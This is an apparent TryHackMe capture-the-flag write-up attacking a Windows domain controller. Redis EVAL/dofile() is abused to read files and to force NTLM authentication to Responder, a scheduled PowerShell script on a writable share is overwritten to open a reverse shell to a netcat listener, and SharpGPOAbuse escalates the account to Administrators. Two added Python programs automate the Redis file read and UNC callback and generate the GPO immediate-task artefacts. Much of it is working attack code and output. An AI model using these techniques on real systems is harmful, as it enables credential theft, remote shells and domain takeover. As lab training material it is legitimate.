# Nmap 7.91 scan initiated Sun Aug 1 15:06:30 2021 as: nmap -sT -sC -sV -vvv -p- -T4 -Pn -oA nmapscan 10.10.188.12
Nmap scan report for 10.10.188.12
Host is up, received user-set (0.055s latency).
Scanned at 2021-08-01 15:06:30 CEST for 187s
Not shown: 65523 filtered ports
Reason: 65523 no-responses
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
6379/tcp open redis syn-ack Redis key-value store 2.8.2402
9389/tcp open mc-nmf syn-ack .NET Message Framing
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49675/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc syn-ack Microsoft Windows RPC
49695/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 9176/tcp): CLEAN (Timeout)
| Check 2 (port 50061/tcp): CLEAN (Timeout)
| Check 3 (port 54977/udp): CLEAN (Timeout)
| Check 4 (port 50181/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-08-01T13:08:59
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 1 15:09:37 2021 -- 1 IP address (1 host up) scanned in 187.42 seconds
Interesting ports: 139 and 445 (SMB) and 6379 (Redis). DNS on 53 and AD Web Services on 9389 (.NET Message Framing) suggest this is a domain controller. Also note that SMB message signing is enabled and required, so relaying any NTLM authentication we capture back to this host is not an option.
SMB enumeration
Maybe SMB will disclose some useful information. Simply connecting to the target with smbclient doesn't help much: anonymous login is accepted, but no shares are listed.
┌──(n㉿kali)-[~]
└─$ smbclient -L \\\\10.10.188.12
Enter WORKGROUP\n's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
However, we are able to at least identify a hostname and domain name using crackmapexec.
After hours of research, it turns out that Redis can execute sandboxed Lua scripts through the EVAL command. In older Redis versions the sandbox still exposes Lua's dofile(), which opens a file from the server's file system and parses it as Lua source. That is enough for an arbitrary file read: any file that is not valid Lua makes the parser fail, and the error message quotes the offending token.
If the file is syntactically invalid as Lua, or tries to set a global variable (which the Redis sandbox forbids), part of the target file's content is leaked through the error message. Note that redis-cli needed no AUTH here, so the instance accepts unauthenticated commands from the network, and the Windows build (2.8.2402) runs with enough rights to read user profile directories.
Why not try reading the user.txt file?
┌──(n㉿kali)-[~/Documents/TryHackMe/VPN]
└─$ redis-cli -h 10.10.188.12 -p 6379 eval "dofile('C:\\\Users\\\enterprise-security\\\Desktop\\\user.txt')" 0
(error) ERR Error running script (call to f_ce5d85ea1418770097e56c1b605053114cc3ff2e): @user_script:1: C:\Users\enterprise-security\Desktop\user.txt:1: malformed number near 'FLAG-REDACTED'
Capturing NTLMv2 hash
Maybe there is a way to capture an NTLMv2 response instead? Let's give that a try by running Responder on the VPN interface, so its SMB server answers if the target ever authenticates to us.
┌──(n㉿kali)-[~]
└─$ sudo responder -I tun0
NBT-NS, LLMNR & MDNS Responder 3.0.6.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.9.1.246]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-MJ06EI78D1C]
Responder Domain Name [7KD0.LOCAL]
Responder DCE-RPC Port [45088]
[+] Listening for events...
Using the EVAL command again, we can instruct the target to connect back to our attacking machine: dofile() with a UNC path pointing at the Responder host makes the Redis service open an SMB session to us and authenticate with the account it runs as (here vulnnet\enterprise-security), and Responder records the NTLMv2 response. Since SMB signing is required on the target, relaying is out; the captured response is cracked offline instead (that step is not shown here).
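As an added example (not from the write-up and not redis-cli's own code), here is the same EVAL/dofile() trick driven from Python over the raw RESP protocol, covering both uses above: a local path to read a file, with the leaked fragment pulled out of the Lua error, and a UNC path to force the outbound SMB authentication that Responder captures. The host, port, paths and the sample error strings are constructed assumptions.

```python
# Added example, not part of the original write-up and not redis-cli's code.
# Talks RESP to Redis directly, sends EVAL "dofile('<path>')", and pulls the
# file fragment out of the Lua parser error. Host, port and paths are assumed
# lab values.
import re
import socket
from typing import Optional


def resp_command(*args: str) -> bytes:
    """Encode a command as a RESP array of bulk strings, as redis-cli does."""
    parts = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg.encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def dofile_script(path: str) -> str:
    """Lua body for EVAL. dofile() opens the path and parses it as Lua source.
    Backslashes and quotes are escaped so the Lua string literal survives.
    A UNC path such as //10.9.1.246/share/x makes the Windows Redis service
    open an SMB session to that host first, which is what Responder captures."""
    escaped = path.replace("\\", "\\\\").replace("'", "\\'")
    return "dofile('%s')" % escaped


# Where the file content shows up in the error text.
LEAK_PATTERNS = (
    re.compile(r"near '([^']*)'"),                    # Lua parser: bad token
    re.compile(r"create global variable '([^']*)'"),  # Redis sandbox: global
)


def extract_leak(error_reply: str) -> Optional[str]:
    """Return the quoted fragment from a '-ERR ...' reply, or None."""
    for pattern in LEAK_PATTERNS:
        match = pattern.search(error_reply)
        if match:
            return match.group(1)
    return None


def read_reply_line(sock: socket.socket) -> str:
    """Read one CRLF-terminated RESP line (an error reply is a single line)."""
    buf = b""
    while not buf.endswith(b"\r\n"):
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf.decode(errors="replace").rstrip("\r\n")


def leak_file(host: str, path: str, port: int = 6379,
              timeout: float = 10.0) -> Optional[str]:
    """Send the EVAL and return the leaked fragment. No AUTH is sent: the
    instance in the write-up accepted unauthenticated commands."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(resp_command("EVAL", dofile_script(path), "0"))
        reply = read_reply_line(sock)
    if not reply.startswith("-"):
        return None  # file parsed as valid Lua or was empty: nothing leaks
    return extract_leak(reply)


if __name__ == "__main__":
    # Assumed lab addresses, same shape as the write-up's redis-cli command.
    print(leak_file("10.10.188.12", r"C:\Users\enterprise-security\Desktop\user.txt"))
    # UNC variant: dofile() fails (returns None here), but the service has
    # already authenticated to the Responder host on the way.
    print(leak_file("10.10.188.12", "//10.9.1.246/share/x"))
```

For the UNC variant the return value is None because dofile() cannot open the share; the interesting result is the NTLMv2 response that shows up on the Responder side.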
Using the username and the password recovered from the captured hash, we can try enumerating SMB again.
┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ smbclient -L \\\\10.10.188.12 -U enterprise-security@vulnnet.local
Enter enterprise-security@vulnnet.local's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Enterprise-Share Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
Let's check out the Enterprise-Share share.
┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ smbclient \\\\10.10.188.12\\Enterprise-Share -U enterprise-security@vulnnet.local
Enter enterprise-security@vulnnet.local's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Feb 23 23:45:41 2021
.. D 0 Tue Feb 23 23:45:41 2021
PurgeIrrelevantData_1826.ps1 A 69 Wed Feb 24 01:33:18 2021
9558271 blocks of size 4096. 4996387 blocks available
The PurgeIrrelevantData_1826.ps1 script seems to be a part of some scheduled task.
Setting up a Netcat listener
I wonder if we can spawn a shell by overwriting the contents of this ps1 file.
┌──(n㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
Command Injection - Powershell
Let's modify the contents of PurgeIrrelevantData_1826.ps1 so that it spawns a reverse shell to our listener, then overwrite the file on the share with the edited version.
The share is writable for enterprise-security, and the scheduled task will run whatever the file contains on its next trigger, as whichever account the task is configured to use.
┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ smbclient \\\\10.10.188.12\\Enterprise-Share -U enterprise-security@vulnnet.local
Enter enterprise-security@vulnnet.local's password:
Try "help" to get a list of possible commands.
smb: \> put PurgeIrrelevantData_1826.ps1
putting file PurgeIrrelevantData_1826.ps1 as \PurgeIrrelevantData_1826.ps1 (4.3 kb/s) (average 4.3 kb/s)
smb: \> put nc.exe
putting file nc.exe as \nc.exe (288.6 kb/s) (average 186.3 kb/s)
I also uploaded the Netcat executable since I didn't receive any STDERR / STDOUT while enumerating the machine using Powershell.
Receiving a shell
WE GOT A SHELL! The task runs the script as enterprise-security itself (see whoami below), so this is interactive access as the same user, not a privilege gain yet.
┌──(n㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.9.1.246] from (UNKNOWN) [10.10.188.12] 49872
whoami
vulnnet\enterprise-security
PS C:\Users\enterprise-security\Downloads>
A more stable shell
Necessary? No. But definitely helpful when you accidentally exit your shell: start a second listener and spawn another shell to it from the first.
┌──(n㉿kali)-[~]
└─$ nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.9.1.246] from (UNKNOWN) [10.10.188.12] 50037
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\enterprise-share>
PowerView - enumeration
After hours of enumeration with PowerView, I found something interesting: two GPOs, security-pol-vn and Default Domain Controllers Policy.
To see who can modify them and where they are linked, collect the domain with SharpHound and load the result into BloodHound.
PS C:\enterprise-share> .\sharphound.exe
----------------------------------------------
Initializing SharpHound at 1:49 PM on 8/4/2021
----------------------------------------------
Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain VULNNET.LOCAL using path CN=Schema,CN=Configuration,DC=vulnnet,DC=local
[+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 59 objects finished (+59 59)/s -- Using 26 MB RAM
Enumeration finished in 00:00:01.1978320
Compressing data to .\20210804134951_BloodHound.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 1:49 PM on 8/4/2021! Happy Graphing!
Shortest Path to Domain Admin
Querying BloodHound, we find that our enterprise-security user has GenericWrite on the security-pol-vn GPO, which is applied to essentially all objects in the vulnnet.local domain, including the domain controller. GenericWrite on a GPO object is enough to push new settings into it (BloodHound lists it as an abusable edge), so every computer the policy applies to will execute whatever we add.
Maybe we can exploit this misconfiguration.... Let's find out!
Abusing GPO permissions
Let's see what we can do to escalate our privileges.
PS C:\enterprise-share> net user enterprise-security
net user enterprise-security
User name enterprise-security
Full Name Enterprise Security
Comment TryHackMe
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2021 4:01:37 PM
Password expires Never
Password changeable 2/24/2021 4:01:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 8/4/2021 1:08:48 PM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.
PS C:\enterprise-share> .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
[+] Domain = vulnnet.local
[+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local
[+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local
[+] GUID of "SECURITY-POL-VN" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Creating file \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
PS C:\enterprise-share> gpupdate /force
gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
Let's review our group memberships after forcing a policy update. Two things are worth noting in the SharpGPOAbuse output: the GUID it resolved for SECURITY-POL-VN, {31B2F340-016D-11D2-945F-00C04FB984F9}, is the well-known GUID of the Default Domain Policy, which explains why this GPO reaches every object in the domain; and the immediate task it wrote runs as SYSTEM on the next computer policy refresh, which gpupdate /force triggers right away because we are on the domain controller itself.
PS C:\enterprise-share> net user enterprise-security
net user enterprise-security
User name enterprise-security
Full Name Enterprise Security
Comment TryHackMe
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2021 4:01:37 PM
Password expires Never
Password changeable 2/24/2021 4:01:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 8/4/2021 1:08:48 PM
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *Domain Users
The command completed successfully.
There we go! The enterprise-security account is now in Administrators. Since this host is a domain controller, that is the domain's built-in Administrators group rather than a local one, so the account is effectively a domain admin.
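As an added example (not from the write-up, and not the source of SharpGPOAbuse), the following Python reproduces the edits SharpGPOAbuse reported above as plain functions, so the mechanics behind abusing GenericWrite on a GPO are visible: the ImmediateTaskV2 XML dropped into the policy's Machine\Preferences\ScheduledTasks folder in SYSVOL, the GPT.ini version bump, and the gPCMachineExtensionNames value that registers the Scheduled Tasks client-side extension on the GPO. The task name, command and author are assumptions; the XML layout and the CSE GUIDs are the ones SharpGPOAbuse/pyGPOAbuse write and should be verified against those tools before use. The functions only produce the content; writing it to SYSVOL and LDAP is left to the caller.

```python
# Added example, not from the write-up and not SharpGPOAbuse's source. Produces
# the three artefacts of an immediate-task GPO abuse: ScheduledTasks.xml, the
# bumped GPT.ini, and the gPCMachineExtensionNames attribute value. Task name,
# command and author are assumptions; GUIDs and XML layout follow what
# SharpGPOAbuse/pyGPOAbuse write and should be checked against those tools.
import re
import uuid
from datetime import datetime, timezone
from xml.sax.saxutils import escape

# Client-side extension GUIDs for Group Policy Preferences scheduled tasks
# (values as used by SharpGPOAbuse/pyGPOAbuse; treat as assumptions).
CORE_CSE = "{00000000-0000-0000-0000-000000000000}"
SCHEDTASK_CSE = "{AADCED64-746C-4633-A97C-D61349046527}"
SCHEDTASK_TOOL = "{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}"
GUID_RE = re.compile(r"\{[0-9A-Fa-f-]{36}\}")


def attr(value: str) -> str:
    """Escape a value for use inside a double-quoted XML attribute."""
    return escape(value, {'"': "&quot;"})


def immediate_task_xml(task_name: str, command: str, arguments: str,
                       author: str, run_as: str = "NT AUTHORITY\\System") -> str:
    """ScheduledTasks.xml with one ImmediateTaskV2 item. The CSE creates the
    task on the next computer policy refresh, runs it once as run_as (SYSTEM
    by default), and removes it afterwards."""
    changed = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S")
    uid = "{" + str(uuid.uuid4()).upper() + "}"
    return f"""<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks clsid="{{CC63F200-7309-4ba0-B154-A71CD118DBCC}}">
  <ImmediateTaskV2 clsid="{{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}}" name="{attr(task_name)}" image="0" changed="{changed}" uid="{uid}">
    <Properties action="C" name="{attr(task_name)}" runAs="{attr(run_as)}" logonType="S4U">
      <Task version="1.3">
        <RegistrationInfo><Author>{escape(author)}</Author><Description></Description></RegistrationInfo>
        <Principals><Principal id="Author"><UserId>{escape(run_as)}</UserId><RunLevel>HighestAvailable</RunLevel><LogonType>S4U</LogonType></Principal></Principals>
        <Settings>
          <IdleSettings><Duration>PT10M</Duration><WaitTimeout>PT1H</WaitTimeout><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings>
          <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
          <AllowHardTerminate>true</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><AllowStartOnDemand>true</AllowStartOnDemand>
          <Enabled>true</Enabled><Hidden>true</Hidden><ExecutionTimeLimit>PT0S</ExecutionTimeLimit><Priority>7</Priority><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter>
          <RestartOnFailure><Interval>PT15M</Interval><Count>3</Count></RestartOnFailure>
        </Settings>
        <Triggers><TimeTrigger><StartBoundary>%LocalTimeXmlEx%</StartBoundary><EndBoundary>%LocalTimeXmlEx%</EndBoundary><Enabled>true</Enabled></TimeTrigger></Triggers>
        <Actions Context="Author"><Exec><Command>{escape(command)}</Command><Arguments>{escape(arguments)}</Arguments></Exec></Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
"""


def bump_gpt_version(gpt_ini: str, computer_side: bool = True) -> str:
    """GPT.ini 'Version' packs two 16-bit counters: user version in the high
    word, computer version in the low word. Clients re-apply a GPO only when
    the relevant half grew, so a machine-side item needs the low word bumped.
    The same number must also be written to the GPO's versionNumber attribute."""
    match = re.search(r"(?m)^Version=(\d+)", gpt_ini)
    version = int(match.group(1)) if match else 0
    user_ver, comp_ver = version >> 16, version & 0xFFFF
    if computer_side:
        comp_ver = (comp_ver + 1) & 0xFFFF
    else:
        user_ver = (user_ver + 1) & 0xFFFF
    new_version = str((user_ver << 16) | comp_ver)
    if match:
        return gpt_ini[:match.start(1)] + new_version + gpt_ini[match.end(1):]
    head = gpt_ini.rstrip("\r\n") + "\r\n" if gpt_ini.strip() else "[General]\r\n"
    return head + "Version=" + new_version + "\r\n"


def merge_extension_names(existing: str) -> str:
    """Return gPCMachineExtensionNames with the Scheduled Tasks CSE registered.
    Format: [{CSE GUID}{tool GUID}...] groups ordered by CSE GUID; the all-zero
    core entry carries the tool GUID as well. Existing entries are preserved."""
    groups = {}
    for body in re.findall(r"\[([^\]]*)\]", existing):
        guids = [g.upper() for g in GUID_RE.findall(body)]
        if guids:
            groups.setdefault(guids[0], set()).update(guids[1:])
    groups.setdefault(CORE_CSE, set()).add(SCHEDTASK_TOOL)
    groups.setdefault(SCHEDTASK_CSE, set()).add(SCHEDTASK_TOOL)
    return "".join("[" + cse + "".join(sorted(tools)) + "]"
                   for cse, tools in sorted(groups.items()))


if __name__ == "__main__":
    # Constructed inputs; the real files live under
    # \\<domain>\SysVol\<domain>\Policies\{<GPO GUID>}\ on the DC.
    print(immediate_task_xml("Debug", "cmd.exe",
                             "/c net localgroup administrators enterprise-security /add",
                             "vulnnet\\administrator"))
    print(bump_gpt_version("[General]\r\nVersion=7\r\n"))
    print(merge_extension_names(""))
```

Three places have to agree for the task to fire: the XML under the policy folder, a GPT.ini Version (and matching versionNumber attribute) higher than what clients last applied, and the CSE registered in gPCMachineExtensionNames; if any of them is missed, gpupdate reports success but never creates the task.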
Obtaining the system flag
Now that we have more privileges, let's access the C$ share and grab the system.txt file.
┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ smbclient \\\\10.10.188.12\\C$ -U enterprise-security@vulnnet.local
Enter enterprise-security@vulnnet.local's password:
smb: \users\Administrator\Desktop\> ls
. DR 0 Wed Feb 24 05:27:33 2021
.. DR 0 Wed Feb 24 05:27:33 2021
desktop.ini AHS 282 Mon Feb 22 22:55:21 2021
system.txt A 37 Wed Feb 24 05:27:45 2021
9558271 blocks of size 4096. 5011466 blocks available
smb: \users\Administrator\Desktop\> mget system.txt
Get file system.txt? y
getting file \users\Administrator\Desktop\system.txt of size 37 as system.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)